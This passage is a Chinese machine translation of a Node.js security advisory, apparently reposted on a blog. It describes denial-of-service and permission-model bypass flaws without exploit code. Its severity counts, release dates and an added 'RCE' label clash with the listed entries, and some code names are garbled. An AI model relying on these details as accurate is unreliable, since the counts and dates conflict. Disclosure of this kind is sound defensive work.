我们发现 Node.js 错误处理机制存在一个漏洞，async_hooks.createHook()启用该机制后，“超出最大调用堆栈大小”错误将无法捕获。process.on('uncaughtException')进程不会到达指定位置，而是直接终止，导致崩溃无法恢复。依赖于AsyncLocalStorage(v22, v20) 或async_hooks.createHook()(v24, v22, v20) 的应用程序在特定条件下容易受到由深度递归触发的拒绝服务攻击。

**影响：**

- 此漏洞影响所有活跃版本系列的用户：20.x、22.x、24.x、25.x

感谢 Andrew MacPherson (AndrewMohawk) 发现此漏洞，感谢 aaron_vercel 报告此漏洞，感谢 mcollina 修复此漏洞。

## 内存泄漏漏洞可导致针对处理 TLS 客户端证书的应用程序的远程拒绝服务攻击 (CVE-2025-59464) - (中等)
Node.js 的 OpenSSL 集成存在内存泄漏问题，当将X.509证书字段转换为 UTF-8 编码而未释放已分配的缓冲区时，就会发生这种情况。当应用程序调用 `get_certificate_fields()` 方法时socket.getPeerCertificate(true)，每个证书字段都会造成内存泄漏，导致远程客户端通过重复建立 TLS 连接不断增加内存占用。随着时间的推移，这可能导致资源耗尽和拒绝服务攻击。

**影响：**

- 此漏洞影响所有活跃版本系列的用户：20.x、22.x、24.x

感谢 giant_anteater 报告此漏洞，也感谢 RafaelGSS 修复了此漏洞。

## 通过未经检查的 Unix 域套接字连接 (UDS) 绕过 Node.js 权限模型 (CVE-2026-21636) - (中等)
Node.js 权限模型的一个缺陷允许 Unix 域套接字 (UDS) 连接在--permission启用时绕过网络限制。即使未启用--allow-net该缺陷，攻击者控制的输入（例如 URL 或 socketPath 选项）也可以通过 net、tls 或 undici/fetch 连接到任意本地套接字。这破坏了权限模型的预期安全边界，并允许访问特权本地服务，可能导致权限提升、数据泄露或本地代码执行。

目前，网络权限（--allow-net）仍处于实验阶段。

**影响：**

- 该问题会影响使用 Node.js v25 版本权限模型的用户。

感谢 mufeedvh 报告此漏洞，也感谢 RafaelGSS 修复了此漏洞。

## TLS PSK/ALPN 回调异常绕过错误处理程序，导致拒绝服务攻击和文件描述符泄漏 (CVE-2026-21637) - (中等)
Node.js TLS 错误处理机制存在缺陷，远程攻击者可以利用该缺陷在 TLS 服务器使用过程中导致服务器崩溃或资源耗尽 pskCallback。ALPNCallback这些回调函数抛出的同步异常会绕过标准的 TLS 错误处理路径（tlsClientError 和 error），导致进程立即终止或静默的文件描述符泄漏，最终造成拒绝服务攻击。由于这些回调函数会在 TLS 握手期间处理攻击者控制的输入，因此远程客户端可以反复触发此问题。

**影响：**

- 此漏洞会影响使用 PSK 或 ALPN 回调的 TLS 服务器，这些服务器在 Node.js 版本中，如果回调没有被安全包装，就会抛出异常。

感谢 0xmaxhax 报告此漏洞，也感谢 mcollina 修复了此漏洞。

## fs.futimes() 绕过只读权限模型 (CVE-2025-55132) - (低)
futimes()Node.js 权限模型的一个缺陷允许即使进程只有读取权限，也可以更改文件的访问和修改时间戳。

与此不同utimes()，futimes()它不会应用预期的写入权限检查，这意味着在只读目录中可以修改文件元数据。这种行为可能被用于篡改时间戳，从而掩盖活动，降低日志的可靠性。

**影响：**

- 此漏洞会影响 Node.js v20、v22、v24 和 v25 中采用权限模型的用户。

感谢oriotie报告此漏洞，也感谢RafaelGSS修复了它。


# 概括
Node.js 项目将于 2025 年 12 月 15 日星期一或之后不久发布 25.x、24.x、22.x 和 20.x 版本系列的新版本，以解决以下问题：

- 3 个高危问题。
- 1 个低严重性问题。
- 1 个中等严重程度的问题。

**影响**

Node.js 25.x 系列版本存在 3 个高危漏洞和 1 个低危漏洞。Node.js 24.x 系列版本存在 3 个高危漏洞、1 个低危漏洞和 1 个中危漏洞。Node.js 22.x 系列版本存在 3 个高危漏洞、1 个低危漏洞和 1 个中危漏洞。Node.js 20.x 系列版本存在 3 个高危漏洞、1 个低危漏洞和 1 个中危漏洞。

[需要注意的是，当发布安全更新时，已停止支持的版本始终会受到影响。为确保系统安全，请使用我们发布计划中列出的最新版本 。](https://github.com/nodejs/release#release-schedule)

**发布时间**

版本将于 2025 年 12 月 15 日星期一或之后不久发布。

【Node.js】2026年1月13日安全更新

热衷分享的技术爱好者，喜欢记录日常生活、交流技术经验、做主机测评以及分享一些有趣的情报。我的目标是让每篇文章都能对你有所启发，无论是学习技术还是了解新鲜资讯。

漏洞类型：未授权访问漏洞 / 权限绕过漏洞（可能导致远程代码执行 RCE）

安全更新已发布

VPS 主机推荐